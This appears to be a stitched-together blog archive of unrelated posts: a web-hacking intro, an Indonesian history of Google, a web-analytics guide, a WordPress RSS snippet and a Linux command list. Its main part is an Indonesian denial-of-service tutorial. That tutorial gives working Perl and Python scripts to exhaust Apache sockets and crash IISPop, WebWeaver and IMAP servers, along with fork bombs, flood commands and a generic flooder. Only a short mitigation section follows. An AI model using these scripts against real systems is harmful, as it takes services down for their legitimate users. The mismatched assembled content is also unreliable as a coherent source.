Hacking ( 1 )

1.0 Introduction

One-way web hacking is a technique which relies purely on HTTP traffic to attack and penetrate web servers and application servers. This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and only valid HTTP responses are allowed out of the firewall.

My research on one-way web hacking began as early as April 2000, when I was faced with the need to upload an arbitrary file on a compromised web server which had a restrictive firewall. Since then, many other techniques developed and the collection of all these techniques resulted into the creation of the one-way web hacking methodology.

One-way web hacking has been demonstrated at the Blackhat Briefings in Amsterdam 2001, Las Vegas 2001 and HACK 2002 in Kuala Lumpur.

1.1 Components of a generic web application system

There are four components in a web application systems, namely the web client which is usually a browser, the front-end web server, the application server and for a vast majority of applications, the database server. The following diagram shows how these components fit together.

The web application server hosts all the application logic, which may be in the form of scripts, objects or compiled binaries. The front-end web server acts as the application interface to the outside world, receiving inputs from the web clients via HTML forms and HTTP, and delivering output generated by the application in the form of HTML pages. Internally, the application interfaces with back-end database servers to carry out transactions.

The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP requests and outgoing HTML replies.

1.2 URL mappings to the web application system

While interacting with a web application, the URLs that get sent back and forth between the browser and the web server typically have the following format:

 http:// server / path / application ? parameters

The following diagram illustrates how different parts of the URL map to various areas in the web application system:

• The protocol (http or https) is allowed in and out by the firewall.

• The server and path parts are parsed by the front-end web server. Any vulnerabilities present in URL interpretation (e.g. unicode, double-decode) can be exploited by tampering with the server and path of the URL.

• The application is executed by the application server with which it is configured or registered. Tampering with this part may result in exploiting vulnerabilities present with the application server. (e.g. compiling and executing arbitrary files using the JSP servlet handler)

• Parameters supplied to the application, if not properly validated, may result in vulnerabilities specific to that application. (e.g. inserting pipe "|" characters to the open() call in Perl)

• If a parameter is used as a part of an SQL database query, poorly validated parameters may lead to SQL injection attacks. (e.g. execution of arbitrary commands using stored procedures such as "xp_cmdshell")

A detailed discussion can be found in Chapter 5 of "Web Hacking: Attacks and Defense" [1]

Sejarah Google

Google adalah sebuah perusahaan Amerika Serikat yang paling terkenal melalui mesin pencarinya yang juga bernama Google.

Google, Inc. (NASDAQ: GOOG) didirikan pada 7 September 1998 di ruang garasi rumah teman mereka di Menlo Park, California. Pada Februari 1999, perusahaan tersebut pindah ke kantor di 165 University Ave., Palo Alto, California sebelum akhirnya pindah ke "Googleplex" pada akhir tahun tersebut.

Google adalah mesin pencari di Internet yang berbasis di Amerika Serikat. Google merupakan salah satu mesin pencari paling populer di web dan menerima setidaknya 200 juta permintaan pencarian setiap hari melalui situsnya dan situs-situs web kliennya seperti American Online (AOL). Kantor pusat Google berada (di "Googleplex") di Mountain View, California.

Sejarah

Halaman hasil pencarian Google.

Google berawal dari proyek penelitian dua mahasiswa Ph.D. Universitas Stanford, Larry Page dan Sergey Brin pada awal 1996 yang mengembangkan teori bahwa sebuah mesin pencari yang berdasarkan analisis matematika hubungan antara situs-situs web akan memberikan hasil yang lebih baik daripada dengan menggunakan teknik-teknik pencarian dasar yang digunakan pada saat itu. Sistem ini pada awalnya dinamakan BackRub karena menggunakan backlink untuk memperkirakan seberapa penting sebuah situs.

Yakin bahwa halaman dengan paling banyak link menuju halaman tersebut dari halaman-halaman web relevan lainnya merupakan halaman-halaman yang paling relevan, Page dan Brin memutuskan untuk mencoba tesis mereka sebagai bagian dari studi mereka - ini menjadi fondasi bagi mesin pencari mereka. Mereka secara resmi membentuk perusahaan mereka Google Inc. pada 7 September 1998.

Google menjadi populer di antara pengguna Internet karena desainnya yang sederhana dan 'bersih' serta hasil pencariannya yang relevan. Iklan dijual berdasarkan kata kunci (keyword) sehingga mereka menjadi lebih relevan bagi para pengguna, dan iklan-iklan tersebut diharuskan menggunkan teks saja agar desain halaman tetap rapi dan loading halaman tetap cepat. Konsep penjualan iklan berdasarkan kata kunci diawali oleh Overture [1] yang dulunya bernama GoTo.com. Pada saat kebanyakan perusahaan dotcom lainnya bangkrut, Google secara diam-diam semakin memperkuat pengaruhnya dan mendapatkan laba.

Pada September 2001, mekanisme pemeringkatan Google (PageRank) diberikan hak paten Amerika. Hak paten tersebut diberikan secara resmi kepada Leland Stanford University dan mencantumkan nama Lawrence Page sebagai sang pencipta. [2]

Pada Februari 2003, Google membeli Pyra Labs, pemilik Blogger, sebuah situs web pionir dan pemimpin hosting weblog. Akuisisi ini tampak tidak konsisten dengan misi umum Google, namun langkah ini membuat Google dapat menggunakan informasi dari posting-posting blog untuk memperbaiki kecepatan dan relevansi artikel-artikel di Google News.

Pada masa puncak kejayaannya pada awal 2004, Google mengurus hampir 80 persen dari seluruh permintaan pencarian di Internet melalui situs webnya dan klien-klien seperti Yahoo!, AOL dan CNN. [3] Share Google turun sejak Yahoo! melepaskan teknologi pencarian Google pada Februari 2004 agar dapat menggunakan hasil pencarian independen mereka.

Measuring Web Site Success

10 Steps to Measuring Web Site Success

Is your Web site working? How would you know? Clients constantly ask me what they should be measuring, and my answer is always, “It depends.” So for all of you who have wondered the same thing, here is the handy-dandy Sterne How-To Guide for measuring the success of your Web site.

1. Identify Key Stakeholders

Who cares? Inside your company, I mean.

Ensuring the success of the company Web site is not something that belongs exclusively to one job function or title. It's not something that can be forced on somebody. If you want your site to be successful and you want to measure that success, then you'll have to round up the people who are vitally interested.

Perhaps they have an agenda and see the Web as a way to help. Perhaps they are techno-geeks and just love to mess around with whatever is on the leading edge. Maybe they like the distinction of being an Internet person. The people in your company who care about your site enough to complain about it should also be asked to join the team willing to take some responsibility for it.

2. Identify Key Stakeholders' Primary Goals

With the stakeholders listed, cataloged, alphabetized and (with any luck) in the same room, find out what they want. This is a multi-tiered question that involves finding out what they want out of the Web site on behalf of the company, on behalf of their departments and as individuals. Sometimes these conversations even get down to how individuals are compensated.

You'll need to get the comprehensive list of objectives, goals and aspirations for everybody who has a strong enough opinion about the site to come to a steering committee meeting. But before you start prioritizing those desired outcomes, it's time to shift your attention outward. There's another batch of people whose opinions about your site matter: site visitors.

3. Identify the Most Important Site Visitors

I've had dozens of conversations with corporate executives about who comes to their Web site and which among them are the most important. The answers are all over the map. They talk about the type of visitor that:

· Shows up the most often

· Stays the longest

· Looks at the most pages

· Buys the most stuff

· Buys the most frequently

· Spends the most money

Generally, people tend to agree that the most important type of visitor is the type that's the most profitable over some period of time. But your mileage may vary.

4. Identify the Most Important Visitors' Primary Goals

This is really pretty simple: ease of use, speed, selection, price. It's all about the user experience. Can they quickly and easily get want they want?

5. Prioritize Everybody's Goals

Now, you finally have all the cards on the table. You know what everybody wants and can start horse-trading. A great many goals will synchronize, but you'll also find that some people have strong opinions about whether raising revenue is more important than lowering costs, or if improving customer satisfaction is job one.

This is a political ball game. The person who feels the strongest may or may not be sidelined by the person with the most seniority. The person with the biggest budget may or may not be outflanked by the person with the closest ties to executive management. This is the part that always reminds me of why I don't work in a corporate environment and why such places need outside consultants every now and then.

At the end of the scrimmage, you'll end up with a list of priorities that may or may not be the very best, but at least they are identified, discussed and prioritized by one and all in the room. Many of those people will not have their way, but at least they were present during the process and understand why the spinning logo is deemed more important than revenues at the moment.

6. Determine Critical Metrics

Which metrics signal whether you are moving closer to your goals or further away? If the main goal is More Visitors, then a clear definition of how visitors are counted is necessary (cookies? logins? javascript?) . If the main goal is revenue, then you'll need to identify the factors that make up the process of getting from awareness to interest to sale. If customer satisfaction is in the mix, then one and all must agree on the methods used to gather satisfaction data and how to weight it.

Again, the accord among the players is more important than the result.

7. Identify the Necessary Technology

With clear goals and metrics in mind, the selection of a Web analytics vendor becomes vastly simpler. You are no longer choosing between an enormous variety of esoteric technologies, but merely asking whether specific data can be captured, collated, correlated and reported—at what cost—and with what flexibility. Flexibility accounts for the fact that you will change your mind in the future about what else you wish to measure.

8. Check References

A robust set of data gathering technologies, a solid financial foundation and a really nice users' group are all well and good, but how does your prospective Web analytics vendor treat their clients? Talk to their references and ask them for the names of other users your vendor might have been reluctant to reveal. Keep asking questions.

9. Distribute Only the Data That Drives Business Decisions

Do not fall back into the briar patch of circulating reports for the sake of spreading the data around. Dole out those reports only to those who need them to make business decisions. Too much data becomes overwhelming and therefore useless.

10. Accountability, Responsibility, Visibility

Liberté, Egalité and Fraternité may have fueled the French Revolution, but the more mundane accountability, responsibility and integrity will determine whether your Web analytics efforts are going to pay off.

Once you have decided what's important and how to measure it, you have to decide what you're going to do about the results, how often you're going to do it and who is going to be responsible. When the numbers are periodically published, whose work product gets reviewed? When the numbers are going south, who gets the bamboo shoots under the fingernails? When the numbers improve, who gets the Employee of the Month parking space?

Don't go through all this effort just so you can say, “Yes, we do Web analytics and we have the reports right here to prove it!” Instead, make sure those reports are an integral part of a process of constant improvement. Then you'll know whether your Web site is working or not.

Jim Sterne (jsterne@targeting. com) is the founder and director of Target Marketing (www.targeting. com). He is also a senior contributor at Marketing Profs .

Denial Of Services

Denial of Services

Apa itu Denial of Service (DoS) ?
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu).
Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini.
Beberapa aktifitas DoS adalah:
1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.

Motif penyerang melakukan Denial of Service
Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melakukan Denial of Service yaitu:
1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Status subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya.
Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon.
Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ...

Denial of Sevice, serangan yang menghabiskan resource.
Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:
A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD
A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth
Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables
Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM
Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk
Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD
Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.

Teknik Melakukan Denial of Service .
Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga tidak begitu menarik.

Kita akan bahas tipe-tipe serangan DoS.
􀂙 SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
􀂙 Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.
􀂙 Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut "smurfing" http://www.quadrunner.com/~chuegen/smurf.txt).
Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan
fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)

Merupakan tool Denial of Service yang dapat digunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.

Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)

2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT

3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.

4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2

5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows

7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death
Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran. bash # ping -fs 65000 [ip_target]

2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com

3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah - pisah.
Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas.

Script gs.pl (gantung socket)
#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !
DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM
#!/usr/bin/perl
fork while 1;

2. Habiskan CPU
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory
#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS
IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vunerable dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl
#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;
print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net
Proof of Concept:
% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host
wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP
}------- start of fadvWWhtdos.py ---------------{
#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input(""" What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""") target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fadvWWhtdos.py ---------------{
Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org
Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentinya server dan harus di-restart secara manual.
Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------
Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'

Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input
dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.
Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS.
Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).
-- udos.pl --
#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# End.
-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !

Penanggulangan serangan Denial of Service.
Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melakukan input flooding dan membuat tool sendiri. Namun Denial of service adalah masalah layanan publik. Sama halnya dengan anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan 'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban kekanakkanakan demikian tentu tidak anda harapkan.

􀂙 Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk menolak cracker untuk mengakses system.

􀂙 Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melakukan Denial of Service -.
Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor atau melakukan up-date.

􀂙 Teknik pengamanan httpd Apache.
Pencegahan serangan Apache Benchmark. Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). Tentunya teknik ini
akan sangat membosankan dimana anda sebagai seorang admin harus teliti. Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. Jangan lupa juga menambah RAM.

􀂙 Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.

Source : IlmuKomputer.com (Haddad)

RSS Function

Retrieves an RSS feed and parses it. Uses the MagpieRSS and RSSCache (http://magpierss.sourceforge.net/) functions for parsing and automatic caching and the Snoopy HTTP client (http://sourceforge.net/projects/snoopy/) for the actual retrieval.

[edit]

Usage

include_once(ABSPATH . WPINC . '/rss.php');
$rss = fetch_rss($uri);
?>

[edit]

Example

To get and display a list of links for an existing RSS feed:

include_once(ABSPATH . WPINC . '/rss.php'); ?>
= fetch_rss('http://example.com/rss/feed/goes/here'); ?>


foreach ( $rss->items as $item ) : ?>

• echo $item['link']; ?>'
  title='echo $item['title']; ?>'>
  echo $item['title']; ?>
  

endforeach; ?>




[edit]

Parameters

$uri

(URI) The URI of the RSS feed you want to retrieve. The resulting parsed feed is returned, with the more interesting and useful bits in the items array.

Basic Linux Commands

Basic Linux Commands

mkdir - make directories

Usage

mkdir [OPTION] DIRECTORY

Options

Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.

-m, mode=MODE set permission mode (as in chmod), not rwxrwxrwx - umask

-p, parents no error if existing, make parent directories as needed

-v, verbose print a message for each created directory

-help display this help and exit

-version output version information and exit

cd - change directories

Use cd to change directories. Type cd followed by the name of a directory to access that directory.Keep in mind that you are always in a directory and can navigate to directories hierarchically above or below.

mv- change the name of a directory

Type mv followed by the current name of a directory and the new name of the directory.

Ex: mv testdir newnamedir

pwd - print working directory

will show you the full path to the directory you are currently in. This is very handy to use, especially when performing some of the other commands on this page

rmdir - Remove an existing directory

rm -r

Removes directories and files within the directories recursively.

chown - change file owner and group

Usage

chown [OPTION] OWNER[:[GROUP]] FILE

chown [OPTION] :GROUP FILE

chown [OPTION] --reference=RFILE FILE

Options

Change the owner and/or group of each FILE to OWNER and/or GROUP. With --reference, change the owner and group of each FILE to those of RFILE.

-c, changes like verbose but report only when a change is made

-dereference affect the referent of each symbolic link, rather than the symbolic link itself

-h, no-dereference affect each symbolic link instead of any referenced file (useful only on systems that can change the ownership of a symlink)

-from=CURRENT_OWNER:CURRENT_GROUP

change the owner and/or group of each file only if its current owner and/or group match those specified here. Either may be omitted, in which case a match is not required for the omitted attribute.

-no-preserve-root do not treat `/' specially (the default)

-preserve-root fail to operate recursively on `/'

-f, -silent, -quiet suppress most error messages

-reference=RFILE use RFILE's owner and group rather than the specifying OWNER:GROUP values

-R, -recursive operate on files and directories recursively

-v, -verbose output a diagnostic for every file processed

The following options modify how a hierarchy is traversed when the -R option is also specified. If more than one is specified, only the final one takes effect.

-H if a command line argument is a symbolic link to a directory, traverse it

-L traverse every symbolic link to a directory encountered

-P do not traverse any symbolic links (default)

chmod - change file access permissions

Usage

chmod [-r] permissions filenames

r Change the permission on files that are in the subdirectories of the directory that you are currently in. permission Specifies the rights that are being granted. Below is the different rights that you can grant in an alpha numeric format.filenames File or directory that you are associating the rights with Permissions

u - User who owns the file.

g - Group that owns the file.

o - Other.

a - All.

r - Read the file.

w - Write or edit the file.

x - Execute or run the file as a program.

Numeric Permissions:

CHMOD can also to attributed by using Numeric Permissions:

400 read by owner

040 read by group

004 read by anybody (other)

200 write by owner

020 write by group

002 write by anybody

100 execute by owner

010 execute by group

001 execute by anybody

ls - Short listing of directory contents

-a list hidden files

-d list the name of the current directory

-F show directories with a trailing '/'

executable files with a trailing '*'

-g show group ownership of file in long listing

-i print the inode number of each file

-l long listing giving details about files and directories

-R list all subdirectories encountered

-t sort by time modified instead of name

cp - Copy files

cp myfile yourfile

Copy the files "myfile" to the file "yourfile" in the current working directory. This command will create the file "yourfile" if it doesn't exist. It will normally overwrite it without warning if it exists.

cp -i myfile yourfile

With the "-i" option, if the file "yourfile" exists, you will be prompted before it is overwritten.

cp -i /data/myfile

Copy the file "/data/myfile" to the current working directory and name it "myfile". Prompt before overwriting the file.

cp -dpr srcdir destdir

Copy all files from the directory "srcdir" to the directory "destdir" preserving links (-poption), file attributes (-p option), and copy recursively (-r option). With these options, a directory and all it contents can be copied to another dir

ln - Creates a symbolic link to a file.

ln -s test symlink

Creates a symbolic link named symlink that points to the file test Typing "ls -i test symlink" will show the two files are different with different inodes. Typing "ls -l test symlink" will show that symlink points to the file test.

locate - A fast database driven file locator.

slocate -u

